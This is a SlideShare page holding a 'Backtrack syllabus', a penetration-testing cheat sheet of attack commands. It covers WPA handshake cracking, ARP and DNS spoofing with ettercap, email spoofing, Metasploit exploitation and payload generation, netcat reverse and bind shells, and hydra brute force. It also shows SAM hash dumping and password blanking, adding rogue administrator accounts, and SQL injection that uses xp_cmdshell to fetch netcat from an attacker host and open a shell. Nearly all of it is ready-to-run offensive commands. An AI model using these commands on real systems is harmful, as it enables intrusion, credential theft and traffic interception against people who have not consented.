Table of Contentscracking wpa-psk (with clients).............................................................................
ettercap:....................................................................................................................
starting wicd network managersudo wicdwicdmounting hardrivessudo mount -t ntfs-3g /dev/sdb1 /mnt/BACKUPsudo mount /dev/sda...
iwlist wlan0 scan                                                                scanning with iwlistifconfig wlan0 up    ...
when u get 403:FORBIDDEN, use WGET to spoof browserspoof the site by using the wget -U option, giving it a user-agent desc...
apachectl stopSSH server:sshd-generate/usr/sbin/sshdpkill sshdssh user@targetIPTFTP server:atftpd --daemon --port 69 /tmp/...
chmod 755 test.sh                  make the file executable./test.sh                          run the fileCompile a progra...
nmap:-sS                                                 TCP SYN scan or Stealth, half open (default)-sT                  ...
<enter 2x>wget targetIP                                             downloads the index.html filecat index.html | more    ...
Select the target > Add to Target 2Mitm > Arp poisoning > Sniff remote connections > OKStart > Start sniffingdsniff -i eth...
Console:./msfconsolehelpshow <option>search <name>use <exploit name>show optionsset <OPTION NAME> <option>show payloadsset...
scanner/smb/versionscanner/mssql/mssql_pingscanner/mssql/mssql_loginPayloads:Attacker behind firewall: bind shellTarget be...
C      C languageP      Perly      RubyR      Raw, allows payload to be piped into msfencode andother toolsJ      JavaScri...
target boxtftp -i 10.1.1.2 GET nc.exeTFTP copies files with read only attributes. So to delete the file:attrib -r nc.exede...
Brute force:ftp with a user name ftphydra -l ftp -P words -v targetIP ftppop3 with a user name mutshydra -l muts -P words ...
Rainbow Tables:rcrack *.rt -f hash.txtPhysical AccessMount a NTFS share in read/write mode:Boot your box with Backtrack.mo...
SQL Server 2000 SP4SQL Server 2005 RTMSQL Server 2005 SP1SQL Server 2005 SP2Authentication bypass: or 1=1--               ...
del nc.exestart ./test.txt:nc.exeA White Hats Pen Test by Mutsnslookupset type=nsset type=mxnmap -sSnmap -sUnc -v target.c...
Upcoming SlideShare
Loading in …5
×

Backtrack syllabus

8,753 views

Published on

3 Comments
5 Likes
Statistics
Notes
No Downloads
Views
Total views
8,753
On SlideShare
0
From Embeds
0
Number of Embeds
1,574
Actions
Shares
0
Downloads
302
Comments
3
Likes
5
Embeds 0
No embeds

No notes for slide

Backtrack syllabus

  1. 1. Table of Contentscracking wpa-psk (with clients)............................................................................................................2connecting via wireless.........................................................................................................................2starting wicd network manager............................................................................................................3mounting hardrives...............................................................................................................................3starting whole networking....................................................................................................................3working with trash................................................................................................................................3killing a process....................................................................................................................................3adding to autostart in Linux..................................................................................................................3checking disk space..............................................................................................................................3checking kernel version........................................................................................................................3checking for usb devices......................................................................................................................3checking for installed wifi cards...........................................................................................................3scanning with iwlist..............................................................................................................................4putting wlan0 up...................................................................................................................................4using metasploit with scan results from Openvas/Nessus....................................................................4converting *.nessus file to *.nbe file....................................................................................................4following victim bowser with ettercap and MITM..............................................................................4capturing image from network and displaying in a X Window............................................................4when u get 403:FORBIDDEN, use WGET to spoof browser..............................................................5spoofing emails.....................................................................................................................................5configuring Sendmail to send mail from command line......................................................................5cracking Speedtouch serial key............................................................................................................5Backtrack COMMANDS:....................................................................................................................5Networking:..........................................................................................................................................5Static IP address:..................................................................................................................................5Services:...............................................................................................................................................5Apache server:......................................................................................................................................5SSH server:...........................................................................................................................................6TFTP server:.........................................................................................................................................6VNC server:..........................................................................................................................................6Check what ports are listening:............................................................................................................6Basics:...................................................................................................................................................6Mount a local hard drive:.....................................................................................................................6Mount a Windows network share:........................................................................................................6Edit a file:.............................................................................................................................................6Compile a program:..............................................................................................................................7Install a new program:..........................................................................................................................7Footprinting:.........................................................................................................................................7Whois:...................................................................................................................................................7DNS:.....................................................................................................................................................7Scanning:..............................................................................................................................................7nmap:....................................................................................................................................................8amap:....................................................................................................................................................8OS Fingerprinting ................................................................................................................................8Banner Grabbing..................................................................................................................................8Windows enumeration:.........................................................................................................................9Using Windows....................................................................................................................................9smbclient:.............................................................................................................................................9rpcclient: ..............................................................................................................................................9ARP Spoofing.......................................................................................................................................9
  2. 2. ettercap:................................................................................................................................................9dns spoofing:......................................................................................................................................10Exploits...............................................................................................................................................10Metasploit:..........................................................................................................................................10Web Interface: ....................................................................................................................................10Console:..............................................................................................................................................11Interactive sessions:............................................................................................................................11Auxiliary scanners:.............................................................................................................................11Payloads:.............................................................................................................................................12Metapreter:.........................................................................................................................................12Automated:.........................................................................................................................................12Payload generator:..............................................................................................................................12What to do after gaining a remote shell .............................................................................................13TFTP...................................................................................................................................................13Netcat..................................................................................................................................................14Passwords...........................................................................................................................................14Physical Access..................................................................................................................................16SQL Injection.....................................................................................................................................16Alternate Data Streams.......................................................................................................................17A White Hats Pen Test by Muts.........................................................................................................18cracking wpa-psk (with clients)iwconfig checking wireless interfacesairmon-ng checking monitoring modeairmon-ng start interface activate monitoring modeairodump-ng --encrypt wpa interface list all access points using wpa-psk scan in progress.... keep information below: ESSID (target wireless name) BSSID (Access point MAC Address) Station MAC Channelairodump-ng --write sniff.cap --channel 11 --bssid sniff the channel and log the result in a capture filexx:xx --encrypt wpa interfaceaireplay-ng -0 1 -a BSSID -c station MAC force disconnection of the station and catch the handshakeinterfaceaircrack-ng sniff.cap check out to see if handshake captureaircrack-ng -c yourcapfile.cap -w crackingyourwordslist.txtconnecting via wirelesssudo iwconfig eth1 mode managed essid BTHomeHub-6EE6 key 3d357f1954ifconfig eth1sudo dhclient eth1
  3. 3. starting wicd network managersudo wicdwicdmounting hardrivessudo mount -t ntfs-3g /dev/sdb1 /mnt/BACKUPsudo mount /dev/sda1 /mnt/WINmount /dev/scd1 /mnt/cdromstarting whole networkingsudo /etc/init.d/networking startworking with trashapt-get install trash-cliempty-trashlist-trash$USERS_HOME/.local/share/Trash/files/ localisation of trash folderkilling a processkill -SIGKILL 5959adding to autostart in Linuxcd /root/.kde3/Autostartln -s /usr/bin/leetmode leetmode making link to a programdiscus checking disk spaceuname -a checking kernel versionlsusb checking for usb devicesdmesg | egrep "rtl|wlan" checking for installed wifi cards
  4. 4. iwlist wlan0 scan scanning with iwlistifconfig wlan0 up putting wlan0 upusing metasploit with scan results from Openvas/Nessusnessus --dot-nessus file.nessus -i "Report Name"-o converted.nbe converting *.nessus file to *.nbe fileload db_postgres loading postgres database matrixdb_create vic1db_import_nessus_nbe vic1.nbedb_hostsdb_autopwndb_autopwn -t -p -e -b launch a full scale exploitationdb_autopwn -t -x analise potential vulnerabilitieshttp://blog.metasploit.com/2006_09_01_archive.htmlfollowing victim bowser with ettercap and MITMsudo ettercap -T -Q -M arp:remote -i eth1 /192.168.1.66/ // -P remote_browserthe -T starts it in text mode.the -Q will make ettercap be superQuiet (not print raw packets in the terminal window)the -M starts man in the middle mode, and the arp:remote is the type of poisoning, and remote is a parameter forMITM. these commands can be combined into one switch like -TQM but for clarity i put them separately.the -i eth1 specifies the network interface and is optional, if you have only one network interface it is probably notneeded. in this case, i was on a laptop using a wifi connection to my AP. this works just as good as a wired connection,and takes no other preparation other than being properly associated with the access point.the /192.168.1.66/ is the victim ip and // means the rest of the segment. i tried it without the // in hopes that it wouldnthave to poison the whole segment, but it didnt seem to work. i know that using ettercap in other ways you can singleout one machine without making a lot of noise on the network.the -P remote_browser is the plugin to follow the victim browserwhen you are done, it is IMPORTANT to end ettercap properly with a q. this re-arps the victims, and restores thenetwork to normal. be careful with ettercap, you have just potentially poisoned the ARP cache on 255 machines, if youjust close the window, you may leave the network in a shambles, and IDS systems may easily point to your IP as aproblem child.http://forum.s-t-d.org/viewtopic.php?id=2594capturing image from network and displaying in a X Windowsudo driftnet -i eth1
  5. 5. when u get 403:FORBIDDEN, use WGET to spoof browserspoof the site by using the wget -U option, giving it a user-agent description of another browser.wget -U Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20070802 SeaMonkey/1.1.4http://yourURL.comTo see what a working browser sends as a user-agent header, you can run netcat on your localhost, and have abrowser try to fetch a page from it:nc -l -p 8000 -v; now, in your browser, go to http://localhost:8000spoofing emails/etc/init.d/sendmail startsendEmail -f 123@123.com -m welcome to the matrix -t napoleon182@interia.plsendEmail -f xxxx1@gmail.com -t xxxxx2@mailinator.com -u testsubject -m testmessage -ssmtp.gmail.com:465 -o tls=yes -xu xxxxx3 -xp ****(password) //if port is no good, try 587configuring Sendmail to send mail from command linehttp://www.ping.co.il/node/2/cracking Speedtouch serial keyhttp://www.nickkusters.com/SpeedTouch.aspxBacktrack COMMANDS:Networking:dhclient get a new IP addressStatic IP address:ifconfig eth0 192.168.0.100/24 set IP address & sub net maskroute add default gw 192.168.0.1 set default gatewayecho nameserver 192.168.0.1 > /etc/resolv.conf set DNS serverServices:Apache server:apachectl start
  6. 6. apachectl stopSSH server:sshd-generate/usr/sbin/sshdpkill sshdssh user@targetIPTFTP server:atftpd --daemon --port 69 /tmp/pkill tftpdVNC server:vncserver start server on TCP port 5901pkill XvncCheck what ports are listening:netstat -ant show listening TCP portsnetstat -anu show listening UDP portsnetstat -ant | grep 22 verify ssh has startednetstat -anu | grep 69 verify tftp has startedBasics:Mount a local hard drive:mount /dev/hda1 /mnt/hda1ls -l /mnt/hda1Mount a Windows network share:share <user> <targetIP> <remote share>share admin 10.1.1.2 c$Enter a password for the remote share.ls -l /mnt/share/umount /mnt/shareEdit a file:nano test.sh create a new file and open it<ctrl> x exity save modified buffer<enter> write changes
  7. 7. chmod 755 test.sh make the file executable./test.sh run the fileCompile a program:gcc -o newname exploit.cgcc -o dcom 66.c./dcomInstall a new program:tar zxvf program.tar.gzcd to the new program folder method 2: bzip2 -cd program.tar.bz2 | tar xvf -./configuremakesu rootmake installFootprinting:Whois:whois target.com contact info, emails, dates, name serversping www.target.com IP address of web serverwhois targetIP network rangeDNS:dig target.com any maps a domain to an IP addressA host maps an IP address to a domainPTR pointer server name for a delegated zoneNS name server zone transfer and record cachingSOA start of authority used to locate services in the networkSRV service locatorMX mail SMTP serverhost -l target.com <name server> zone transferhttp://centralops.net/http://clez.net/net.apphttp://www.robtex.com/http://serversniff.net/Scanning:scanrand -b10M targetIP:quick
  8. 8. nmap:-sS TCP SYN scan or Stealth, half open (default)-sT TCP full connect (very noisy)-sU UDP scan-PS SYN packet discovery (best against stateful firewalls)-PA ACK packet discovery (best against stateless firewalls)-PN dont ping-n no reverse DNS lookup-A combines -O and -sV-O OS fingerprinting-sV service version (banner)-p ports to scan (T:port,U:port)-T timing (0-5) paranoid, sneaky, polite, normal, aggressive, insane-iL input list of hosts to scan-oG grepable output to a filenmap -sS -PN -n targetIPnmap -sU -PN -n targetIPnmap -sT -PN -n targetIP -A -p open ports -T5 -oGscan.txtnmap -sS -p 135,139,445 targetIPnmap -sS -p T:1433,U:1434 targetIP Take the results from nmap and check for services onamap: uncommon ports.amap -i scan.txtOS Fingerprintingp0f -i eth0 -U -p use interface eth0, don’t display unknown signatures, promiscuouspoint a browser to the targetIP read traffic on p0fxprobe2 targetIPBanner Grabbingnc targetIP port check if the port is opennc 10.1.1.2 80telnet targetIP port telnet may yield slightly different resultsHEAD /HTTP/1.0
  9. 9. <enter 2x>wget targetIP downloads the index.html filecat index.html | more view file one page at a time, space bar for next pageq exit fileWindows enumeration:nmap -sS -p 139,445 targetIPcd /pentest/enumeration/smb-enumnbtscan -f targetIP check to see if NetBIOS is enabledsmbgetserverinfo -i targetIP name, OS and workgroupsmbdumpusers -i targetIP list userssmbclient -L //targetIP list sharesUsing Windowsnet use targetIPipc$ "" /u:"" start a NULL sessionnet view targetIP view sharessmbclient:smbclient -L hostName -I targetIP enumerate sharessmbclient -L hostName/share -U "" connect to open share with a blank user namesmbclient -L hostName -I targetIP -U admin connect to open share with user name adminrpcclient:rpcclient targetIP -U “” start a NULL sessionnetshareenum enumerate sharesenumdomusers enumerate userslsaenumsid enumerate domain SIDsqueryuser RID user info, try 500, 501, 1000, 1001createdomuser create user accountARP Spoofingettercap:nano /usr/local/etc/etter.confUnder the Linux section, uncomment both lines under iptables.Sniff > Unified sniffing > Network interface: eth0 > OKHosts > Scan for hosts (do this two times)Hosts > Hosts listSelect the default gateway > Add to Target 1
  10. 10. Select the target > Add to Target 2Mitm > Arp poisoning > Sniff remote connections > OKStart > Start sniffingdsniff -i eth0urlsnarf -i eth0msgsnarf -i eth0driftnet -i eth0dns spoofing:nano /usr/local/share/ettercap/etter.dnsEdit the Microsoft lines (target URL) to redirect to the attacker.Plugins > Manage the plugins > dns_spoofMitm > Arp poisoning > Sniff remote connections > OKStart > Start sniffingExploitscd /pentest/exploits/milw0rmcat sploitlist.txt | grep -i [exploit]Some exploits may be written for compilation under Windows, while others for Linux.You can identify the environment by inspecting the headers.cat exploit | grep "#include"Windows: process.h, string.h, winbase.h, windows.h, winsock2.hLinux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.hGrep out Windows headers, to leave only Linux based exploits:cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -uMetasploit:svn update Update frameworkWeb Interface:./msfweb
  11. 11. Console:./msfconsolehelpshow <option>search <name>use <exploit name>show optionsset <OPTION NAME> <option>show payloadsset PAYLOAD <payload name>show optionsset <OPTION NAME> <option>show targetsset TARGET <target number>exploitInteractive sessions:sessions -l list active sessionssessions -i <ID> sessions -i 4, interact with sessionsessions -k <ID> sessions -k 4, kill session 4<ctrl> z background a session<ctrl> c kill a sessionjobs list exploit jobs runningjobs -K kill all jobsAuxiliary scanners:show auxiliaryuse <auxiliary name>set <OPTION NAME> <option>runscanner/discovery/sweep_udp
  12. 12. scanner/smb/versionscanner/mssql/mssql_pingscanner/mssql/mssql_loginPayloads:Attacker behind firewall: bind shellTarget behind firewall: reverse shellMetapreter:Automated:db_import_nessus_nbe import Nessus results in NBE formatdb_import_nmap_xml import nmap results in XML format (-oX)cd /pentest/exploit/framework3./msfconsoleload db_sqlite3db_destroy pentest delete old database called pentestdb_create pentest create a new database call pentestdb_nmap targetIP run nmap through the framework and store results in databasedb_hosts show hosts discovereddb_services show services running on each hostdb_autopwn show optionsdb_autopwn -t -p -e select modules based on open ports, show matching exploits, exploitCommand Line Interface:./msfcli | grep -i <name> search for an exploit or auxiliary./msfcli <exploit or auxiliary> S summary info./msfcli <exploit name> <OPTION NAME>=<option>PAYLOAD=<payload name> EPayload generator:./msfpayload <payload> <variable=value> <output type>S summary and options of payload
  13. 13. C C languageP Perly RubyR Raw, allows payload to be piped into msfencode andother toolsJ JavaScriptX Windows executable./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1C./msfpayload windows/meterpreter/reverse_tcpLHOST=10.1.1.1 LPORT=4444 X > evil.exeEncode shellcode:./msfencode <options> <variable=value>Pipe the output of msfpayload into msfencode, show bad characters and list available encoders../msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b x00 -lChoose the PexFnstenvMor encoder and format the output to C../msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b x00 -e PexFnstenvMor -t cWhat to do after gaining a remote shellhostnamenet usersnet user x hack /addnet user x /addnet localgroupnet localgroup administratorsnet localgroup administrators x /addDont use interactive programs like FTP from a remote shell.TFTPattack box 10.1.1.2cp /pentest/windows-binaries/tools/nc.exe /tmp/
  14. 14. target boxtftp -i 10.1.1.2 GET nc.exeTFTP copies files with read only attributes. So to delete the file:attrib -r nc.exedel nc.exeNetcatattacker: 10.1.1.1target: 10.1.1.2Port scanner:nc -v -z 10.1.1.2 1-1024 scan ports 1 to 1024Chat session:target: nc -lvp 4444 start Netcat and listen verbosely on port 4444attacker: nc -v 10.1.1.2 4444Transfer file to target:target: nc -lvp 4444 > output.txtattacker: nc -v 10.1.1.2 4444 < test.txtBind shell:target: nc -lvp 4444 -e cmd.exe should be sitting at a command prompt of the targetattacker: nc -v 10.1.1.2 4444Reverse shell:target: nc -lvp 4444attacker: nc -v 10.1.1.2 4444 -e /bin/bashThe target should be sitting at an invisible command prompt of the attacker.You will not see a prompt. Issue any linux command to verify.PasswordsWord list:zcat /pentest/password/dictionaries/wordlist.txt.Z > wordscat words | wc -lAbout 306,000 passwords.
  15. 15. Brute force:ftp with a user name ftphydra -l ftp -P words -v targetIP ftppop3 with a user name mutshydra -l muts -P words -v targetIP pop3snmphydra -P words -v targetIP snmpMicrosoft VPNnmap -p 1723 targetIPdos2unix wordscat words | thc-pptp-bruter targetIPWYD:Use wget to download specific files.wget -r www.target.com –accept=pdf -f switch will read pwdump fileswyd.pl -o output.txt www.target.com/cat output.txt | moreSAM file:%SYSTEMROOT%/system32/config%SYSTEMROOT%/repair backup copy not locked by the OSDumping hashes:./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp Emeterpreter > upload -r /tmp/pwdump6 c:windowssystem32meterpreter > execute -f cmd -cmeterpreter > interact x where x is Channel created.C:WINDOWSsystem32> pwdump 127.0.0.1John the Ripper:Paste the hashes into a new file.nano hash.txtDelete unneeded accounts.cp hash.txt /pentest/password/john-1.7.2/run/cd /pentest/password/john-1.7.2/run/./john hash.txt
  16. 16. Rainbow Tables:rcrack *.rt -f hash.txtPhysical AccessMount a NTFS share in read/write mode:Boot your box with Backtrack.mountumount /mnt/hda1modprobe fusentfsmount /dev/hda1 /mnt/hda1mountls -l /mnt/hda1Dump the SAM file:bkhive /mnt/sda1/WINDOWS/system32/config/system system.txtsamdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txtcat hash.txtModify SAM file directly:chntpw /mnt/sda1/WINDOWS/system32/config/SAMBlank the password. *Do you really wish to change it? yWrite hive files? yunmount /mnt/sda1rebootSQL Injectionnmap -sS -p 1521 targetIP Oraclenmap -sS -p T:1433,U:1434 targetIP MS SQLReleaseSQL Server 2000 RTMSQL Server 2000 SP1SQL Server 2000 SP2SQL Server 2000 SP3SQL Server 2000 SP3a
  17. 17. SQL Server 2000 SP4SQL Server 2005 RTMSQL Server 2005 SP1SQL Server 2005 SP2Authentication bypass: or 1=1-- minus minus closes the SQL query, everything after it is ignoredEnumerating table names: having 1=1-- group by table having 1=1-- group by table, table2 having 1=1-- group by table, table2, table3 having 1=1--Enumerating column types:union select sum(column) from table --union select sum(column2) from table --Adding data: ; insert into table values(value,value2,value3)--MS SQL stored procedure:Output the database info into an html file, that you can view with a browser. ; exec sp_makewebtask "c:Inetpubwwwroottest.html", "select * from table" ; --www.target.com/test.htmlRun ipconfig on target and write to a file, that you can view with a browser. or 1=1; exec master..xp_cmdshell "ipconfig" > c:Inetpubwwwroottest.txt ;--www.target.com/test.txtUpload netcat and spawn a reverse shell. or 1=1; exec master..xp_cmdshell "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe ; --attacker: nc -lvp 53Alternate Data StreamsHide netcat inside a text file. Note netcat must be located in the current directory.echo "This is a test" > test.txttype nc.exe > test.txt:nc.exe
  18. 18. del nc.exestart ./test.txt:nc.exeA White Hats Pen Test by Mutsnslookupset type=nsset type=mxnmap -sSnmap -sUnc -v target.com 23snmpenumSolarwindstftp the router config fileUse a perl script to decrypt the passwordsFind internal mail server in config file.nc -n internalserver.com 80Edit config file to open more port on the router, 135,139,445,1000Use Metasploit to send RPC exploittftp -i attackIP GET pwdump4.exepwdump4.exe 127.0.0.1>hashes.txttftp -i attackIP PUT hashes.txtCrack hashes with rainbow table.Use Remote Desktop to connect to server.

×